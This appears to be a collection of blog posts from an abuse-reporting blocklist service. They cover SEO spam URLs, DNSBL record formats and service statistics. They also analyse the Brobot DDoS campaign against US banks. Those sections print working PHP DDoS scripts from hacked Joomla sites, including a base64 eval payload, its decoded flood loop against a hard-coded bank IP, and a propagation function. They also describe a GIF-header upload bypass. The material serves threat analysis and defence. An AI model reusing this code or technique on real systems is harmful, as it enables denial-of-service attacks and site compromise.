Fail2Ban Reporting Service

After the last „URL-Reporting“ there was used most *.pl Domains, but now we have found over 9,181 URLs from *.blog.com which was abused by SEO-Spamer to get Traffic by good sites over blog.com to there „Money-Sites“.

On there Moneysites, he offer to make money over clickbank with Affiliates.

Other blog.com URLs, but with the same content or a little bit different content, but all redirects to clickbank.com:

Some Links go to the „Money-Site“ of the SEO-Spamer over tinyurl.com: „hxxp://tinyurl.com/cszvyuf/go8.php?aHR0cDovL2p1bDRvbm9rODUuZWJheWNlcnQuaG9wLmNsaWNrYmFuay5uZXQ=“

And then to: „http://www.jobreplacementformula.com/clickbank.php?hop=codelocker“ or direct to clickbank.com

And on there, all Links goes to hxxp://www.lottomasterformula.com like this:

hxxp://www.lottomasterformula.com/dlguard/dlg/sell.php?prodData=cb%2C6

and then to clickbank.com:

hxxps://ssl.clickbank.net/order/orderform.html?time=1370165174&vvvv=6562617963657274&item=1&detail=Job+Replacement+Formula+67&vvar=detail%3DJob+Replacement+Formula+67%26dlgp%3D6&oaref=01.09B9DCCD9E0E71A5790AC3235281919F0D991A7DEB89597DD4E6AA7D1731DA971A6BC929777E2ED95D5AF51F83B0AA90A0AF6050AB48256725481747D07F78E1ECBF3B2FC242EF671C76543A63F84442719A7B93

From there, you have an order-formular to buy the Book how can you make many with clickbank.com for only „$67.00“:

On the bottom there is a Text from a Banner with „codelocker.blogcom“ which was not replaced from a JavaScript in the Chrome-Browser under the VirtualMachine:

We have report the URLs over the Ticket-System to blog.com and wait for an response. At this time, i don’t think, that blog.com uses clickbank.com to make adds on there site….

In the most case of sites with user generated content, the urls will be disabled/deleted.

Currently we have over 2,677,883 URLs in our Database which was posted by Spamer in our Honeypot-Systems. We look in the next time how many new urls come daily into and add a rbl-List with these URLS.

Have interests on this URLs, please contact us.

We have insert in the TXT-Record of the RBLDNS now the unix Timestamp of the last Attack which we received.
We listen IPs 48 Hours along in our Lists, but dynamically Addresses will be changed from some Provider after 12 Hours.
Now you can see when blocklist.de received the last Attack from the queried IP.

For example for the IP 186.241.250.183:
#dig 183.250.241.186.apache.bl.blocklist.de TXT

;; ANSWER SECTION:
183.250.241.186.apache.bl.blocklist.de. 2467 IN TXT "Infected System (Service: apacheddos, Last-Attack: 1369828413), see http://www.blocklist.de/en/view.html?ip=186.241.250.183"


You can parse between Last-Attack: and ), the Unix Timestamp.

A other way was to add the age of last Attack in the A-Record in Hours like this:
127.0.0.x for last Attack was under one Hour old
127.0.2.x the last Attack was older between 2 hours

Please wrote into the comments about the second Way to inser the age in the A-Record.

Currently, blocklist.de has the following Stats/User:

User: 853

Server: 1015

Attacks: 290,425,621

Reports: 4,546,850

Daily Mails: ~170100 (lower limit) ~360000 (high limit)

Web-Traffic: ~220 GB

RBL-/API-Traffic: ~70 GB

Mail (In/Out)-Traffic: ~~2130 GB In 04/2013 we use now the local IPs, so the Traffic between the Reporting-Server was not longer included and the Traffic is going down

Traffic over IPv6 (Mail, Web..): ~6GB

To this data, there comes 2,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~3,8 GB each Hour out.

The Mysql-Server use now 40% from 32GB Ram. And the System-Load is in average on 1.00 .

The WebServer is using not full of 13GB Ram and the System-Load is under 0,7. The open Connections are ~2000

The complete Traffic from all Systems are round about 4,2TB in March 2013.

Since 2013-04-02 T18:05 UTC, the brobot starts Attacks against the US Banks again.

He send now the following Code and execute them:

Here is one of the complete Code (he has different Codes) (new lines insert by us, to read it better):


function randomvar(){
$a=chr(rand(97,122));
$b=rtrim(base64_encode(rand(100,10000)),'=');
return $a.$b;
}
$url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
$rand = md5(microtime().rand(0,500));
if(preg_match("/\?/",$url))
$url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
else
$url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
if(!function_exists('scandir'))
{
function scandir($a,$b=false,$c=true)
{
$d=array();
if($e=opendir($a))
{
while(false!==($f=readdir($e)))
{
if(($f!="."&&$f!="..")||$c==true)
{
if($b==false)
if(is_dir($f))
continue;
array_push($d,basename($f));
}
}
closedir($e);
}
return $d;
}
}

function tgya8siudj()
{
if(@is_writable('/tmp'))
return '/tmp';
elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
elseif(!function_exists("sys_gt_temp_dir"))
{
if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
return realpath($_ENV["TMP"]);
elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
return realpath($_ENV["TMPDIR"]);
elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
return realpath($_ENV["TEMP"]);
else
{
$a=gyhuijoakosdoj();
if($a==!false)
return $a;
$p=tempnam(md5(uniqid(rand(),TRUE)),"");
if($p)
{
$q=realpath(dirname($p));
@unlink($p);
return $q;
}
else
return false;
}
}
else
return sys_get_temp_dir();
}
exit;

complete Code formated

He has now here own „scan_dir“ function, when the Function not exists or is disabled.
And he looks now to execute the ddos over exec with wget or proc_open and other functions, but not longer with fsocketopen or stream….
Are two many systems without socket support?
Update:Here is acode with socket

The Hackers have write a new Phase for „Phase3/W5 Operation Ababil“

In the last Days, the BroBot Runners runs a new Wave with and send POST-Requests with c_id to the hacked Sites.

The Data (base64_encoded) has the following Skript/Data:

The Script calls in each Post-Request 140 to 180 others hacked URLs:


....
function send($target){
forkill();
if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
global $code;
}    else{
$code = $_REQUEST["c_id"];
}
if(!preg_match("/http/i",$target))
$target = "http://$target";
$parts = @parse_url($target);
$host = $parts["host"];
$path = $parts["path"];
if($path=="")$path="/";
$data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
$request = "POST $path HTTP/1.1\r\n"
."Host: $host\r\n"
."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
."Accept: */*\r\n"
."Accept-Language: en-us,en;q=0.5\r\n"
."Accept-Encoding: deflate\r\n"
."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
."Content-type: application/x-www-form-urlencoded\r\n"
."Content-Length: ".strlen($data)."\r\n"
."Connection: Close\r\n"
."Cache-Control: no-cache\r\n\r\n{$data}";
forkill();
$fp = @fsockopen($host, 80);
@stream_set_timeout($fp, 3000);
@fwrite($fp, $request);
@stream_set_blocking($fp, 0);
return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
@unlink(writabledir()."/res"."2ebx839d1fb28e");
flush();
}
$fn = lock();
....

 

We have found currently 3357 URLs with hacked Joomlas/Sites.

Over 2.500 Script/URLs are online. In the next days, we look to report the Site to Bank of America or directly to the Hoster to check and fix the site.

We will analysed in the next Days the complete PHP-Code and write a little bit what is not good and can be make better 🙂

If you want to get the complete code, please contact us.

We have currently the following Servers with the following Timezones (Location):

Count Timezone (Order by Count, desc):

Count Timezone (Order by Timezone asc):

Old Servers which have no Location/Timezone or never send Reports from Service which has no Timezone in the Logs, was not listed here.

We seen the first ddos against ns1.google.com and bank of america on 19.09.2012:

https://blog.blocklist.de/2012/09/15/ddos-angriff-auf-ns1-google-com-uber-gehackte-webseiten/

The Hacker abused old installations of „bluestork“-Templates and old WordPress-Sites.

And he upload the complete Script and calls him over get-Parameters to start it.

Then he changed it to upload only html-Forms over old Joomlas < 2.5.7 (most the JCE-Editor was hacked) and use the gif-Failure in php and Skript (the upload-Script has in the first lines a Gif-Header and binary code.

The „file“ Program and Linux says it is an gif-image, but he has after them normal php-code.

Over the Upload-Script, he uploads a small other Script and sends the Data over POST with base64_decode() the complete Data from one of the Post-Data from $_REQUEST[‚mjdu‘] was:


eval(base64" - replace it with _"decode("DQokaWlpPScxNzEuMTYxLjE5OS4xMDAnOw0KJHBwcD0nNDQzJzsNCiRkZGQ9JzM2MDAnOw0KJHNzdHQ9JzMwJzsNCiRycnR0PSc1JzsNCiRwcHNzPSczJzsNCmlmKGZpbGVfZXhpc3RzKCJzdGV4dC50eHQiKS
kNCnsNCgkkZmZwPWZvcGVuKCJzdGV4dC50eHQiLCJyIik7DQoJJHJyPWZyZWFkKCRmZnAsOCk7DQoJZmNsb3NlKCRmZnApOw0KCWlmKCRycj09Ik5vVHRFeFRyVW4iKQ0KCXsNCgkJJGZmcDI9Zm9wZW4oInN0ZXh0LnR4dCIsIncrIik7D
QoJCWZjbG9zZSgkZmZwMik7DQoJCXVubGluaygic3RleHQudHh0Iik7DQoJCWV4aXQoKTsNCgkJZGllKCk7DQoJfQ0KCXVubGluaygic3RleHQudHh0Iik7DQp9DQoNCiRzdGVwX3RpbWU9dGltZSgpKyRzc3R0Ow0KJHJlbGVhc2VfdGlt
ZT10aW1lKCkrJHJydHQ7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFsndGltZV9lJ10pKQ0Kew0KCSRtYXhfdGltZSA9ICRfUkVRVUVTVFsndGltZV9lJ107DQp9DQplbHNlDQp7DQoJJHRpbWUgPSB0aW1lKCk7DQoJJG1heF90aW1lID0gJHR
pbWUrJGRkZDsNCn0NCgkkb3V0PXN0cl9yZXBlYXQoIi4iLCAkcHBzcyk7DQokZmlyc3QxPTA7DQp3aGlsZSh0aW1lKCkgPCAkbWF4X3RpbWUpDQp7CQ0KCWlmKHRpbWUoKSA+ICRyZWxlYXNlX3RpbWUgJiYgJGZpcnN0MT09MCkNCgl7DQ
oJCSRmaXJzdDE9MTsNCgkJJGFkZHJlc3NfaG9zdD0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiIvIi4kX1NFUlZFUlsnUEhQX1NFTEYnXTsNCgkJJGRhdGExWydtamR1J109JF9SRVFVRVNUWydtamR1J107DQoJCSRkYXRhM
VsncHNidCddPSRfUkVRVUVTVFsncHNidCddOw0KCQkkZGF0YTFbJ3RpbWVfZSddPSRtYXhfdGltZTsNCgkJJGNoMSA9QGN1cmxfaW5pdCgpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfVVJMLCRhZGRyZXNzX2hvc3QpOw0KCQlj
dXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsRkFMU0UpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsMik7DQoJCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9IRUFERVIsMSk7DQo
JCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwwKTsNCgkJY3VybF9zZXRvcHQoJGNoMSxDVVJMT1BUX1RJTUVPVVQsMTApOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfUE9TVCwgdHJ1ZSk7DQoJCWN1cmx
fc2V0b3B0KCRjaDEsQ1VSTE9QVF9QT1NURklFTERTLCAkZGF0YTEpOw0KCQljdXJsX2V4ZWMoJGNoMSk7DQoJCWN1cmxfY2xvc2UoJGNoMSk7DQoJfQ0KCWlmKHRpbWUoKSA+ICRzdGVwX3RpbWUpDQoJew0KCQlAZXhpdCgpOw0KCQlAZGl
lKCk7DQoJfQ0KCSRzb2NrZXQgPSBAc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovLyRpaWk6JHBwcCIsJGVyciwkZXJyMiwxLFNUUkVBTV9DTElFTlRfQVNZTkNfQ09OTkVDVCk7DQoJCWlmICgkc29ja2V0KSANCgkJew0KCQkJQHN0cmV
hbV9zZXRfd3JpdGVfYnVmZmVyKCRzb2NrZXQsIDApOw0KCQkJQHN0cmVhbV9zb2NrZXRfc2VuZHRvKCRzb2NrZXQsJG91dCk7DQoJCX0NCglAZmNsb3NlKCRzb2NrZXQpOzsNCn0NCiRmZnAyPWZvcGVuKCJzdGV4dC50eHQiLCJ3KyIpO2Z
jbG9zZSgkZmZwMik7dW5saW5rKCJzdGV4dC50eHQiKTs="));


encoded it was:


$iii='171.161.199.100';
$ppp='443';
$ddd='3600';
$sstt='30';
$rrtt='5';
$ppss='3';
if(file_exists("stext.txt"))
{
$ffp=fopen("stext.txt","r");
$rr=fread($ffp,8);
fclose($ffp);
if($rr=="NoTtExTrUn")
{
$ffp2=fopen("stext.txt","w+");
fclose($ffp2);
unlink("stext.txt");
exit();
die();
}
unlink("stext.txt");
}
$step_time=time()+$sstt;
$release_time=time()+$rrtt;
 
if(isset($_REQUEST['time_e']))
{
$max_time = $_REQUEST['time_e'];
}
else
{
$time = time();
$max_time = $time+$ddd;
}
$out=str_repeat(".", $ppss);
$first1=0;
while(time() < $max_time)
{
if(time() > $release_time && $first1==0)
{
$first1=1;
$address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
$data1['mjdu']=$_REQUEST['mjdu'];
$data1['psbt']=$_REQUEST['psbt'];
$data1['time_e']=$max_time;
$ch1 =@curl_init();
curl_setopt($ch1,CURLOPT_URL,$address_host);
curl_setopt($ch1,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch1,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch1,CURLOPT_HEADER,1);
curl_setopt($ch1,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch1,CURLOPT_TIMEOUT,10);
curl_setopt($ch1,CURLOPT_POST, true);
curl_setopt($ch1,CURLOPT_POSTFIELDS, $data1);
curl_exec($ch1);
curl_close($ch1);
}
if(time() > $step_time)
{
@exit();
@die();
}
$socket = @stream_socket_client("tcp://$iii:$ppp",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
if ($socket)
{
@stream_set_write_buffer($socket, 0);
@stream_socket_sendto($socket,$out);
}
@fclose($socket);;
}
$ffp2=fopen("stext.txt","w+");fclose($ffp2);unlink("stext.txt");


Why he use:
@exit();
and
@die();
one of them are enough 😉 die() is the same like exit() ->
function die on php.net

There was better code after the first script, in which he has curl-functions again and again. For this code you usually uses functionals to deduce double code 🙂

on the 22.01.2013 we found over 250 abused Joomla-Installations.

Today (25.01.2013) he hacks Joomla Installations with a Version under 2.5.8 and WordPress with older Plugins like akisment version 2.5.5.

Is is necessary to update your Installations very fast or your Server attacks us-financial institutions 🙂

Think about over 250 hacked sites on Servers from only one hoster to create a ddos, you have a lot of power and bandwidth and we think in the world, there a very large numbers of old Joomla-Installations on Servers 🙂

In the last Days and Weeks, we get a very large List of SEO-/Spam-URLs with .pl-Domains like this:

http://38291.8gx5zj6a7.pl/

http://20851.y5pcbti2p.pl/

http://10533.m6lkmh37r.pl/

http://35754.igzkbz6j1.pl/

Now the Spamer has changed the Server. The Domains linked now to the IP 178.33.177.193 hosted on OVH-System.

We send for the Spam-URLs a X-ARF-Report via spamlinks.blocklist.de to the Abuse-Department to look at the the Spam-URL. We send only a Report, when the Spam-Score is high enough. So, the false-positive rate is under 5%.

We recommd to block the IP in all Firewalls and Gateways.

In the last Days we see 13 IPs from the Network MICROSOFT-CORP—MSN-AS-BLOCK – Microsoft Corp // ASN8075 from a lot of Forum-Spam-/SSH-/Voip-/SIP-Attacks.

We send the default X-ARF-Abuse-Complaint, but only the Server which makes SSH-/Sip-Attacks was stoped or not longer reported to us.

So, we send a normal Mail to noc@microsoft.com, abuse@microsoft… abuse@msn…. but received only the acknowledgement-Mail and a bounce-Mail from noc@ that the account does not exist, but is aviable in the Whois-Data.

On the Server there are the rdp-Port open:

We thinking there are Developement-Systems there was hacked or false configured, that he have a (Reverse)Proxy which allows to get URLs from other URLs and not only from the same system.

Some IPs was heavy, like this IP 157.56.166.51 he has send over 760400 Spam-Comments/Posts or automatically Registrations in Honeypot-Systems. The most IPs was stopped or was never reported to us after yesterday, but one IP is still alive.

We wait for a Answer from microsoft so far 😐

[UPDATE 22.07.2013 11:00:00]
We received an Anser from Microsoft:
 


Hello,

Rechie
Online Safety Team


We have try to send a Report, but get only the following error-message:
An internal error has occured, please try again. Object reference not set to an instance of an object.
With an fake Referer, the Form works.
But dear Microsoft, please use a X-ARF-Parser and generate a new Report with your own format from your Form.

Wir haben soeben die BETA für die HTTP-API online gestellt:

http://www.blocklist.de/de/httpreports.html

Darüber kann man mit z.B. curl/lynx/wget die Daten an BlockList.de melden und braucht kein Mailsystem auf dem Server zu installieren.

Es benötigt zum aufrufen folgende Daten:

• Server-E-Mailadresse oder ID
• Server-API-Key
• Attacker-IP
• angegriffener Dienst (ssh, imap, ftp….)
• Logfiles
• format (xml, json, text, php)

Dann kann man die Daten per POST/GET absenden:

curl -s „http://www.blocklist.de/de/httpreports.html?server=$email@server.tld&apikey=$apikey&ip=$angreiferIP&service=$dienst&logs=urlencode($logs)&format=php“

Je nach dem, wie das Rückgabe-Format ist, hat man die Variablen status und error:

xml:

<status>success</status>

<error>0</error>

Wenn status den Inhalt success, dann hat alles gepasst.

Ansonsten ist die Variable $error nicht 0 und hat man hat je nach Fehler-Art diese in $error enthalten:

<server>API-Key stimmt nicht mit dem Server ueberein.</server>

<status>error</status>

Da es noch nicht wirklich erprobt ist und bisher nur von mir getestet wurde, kann es noch Bugs geben. Bitte alle Bugs oder Wünsche daher an uns melden. Danke!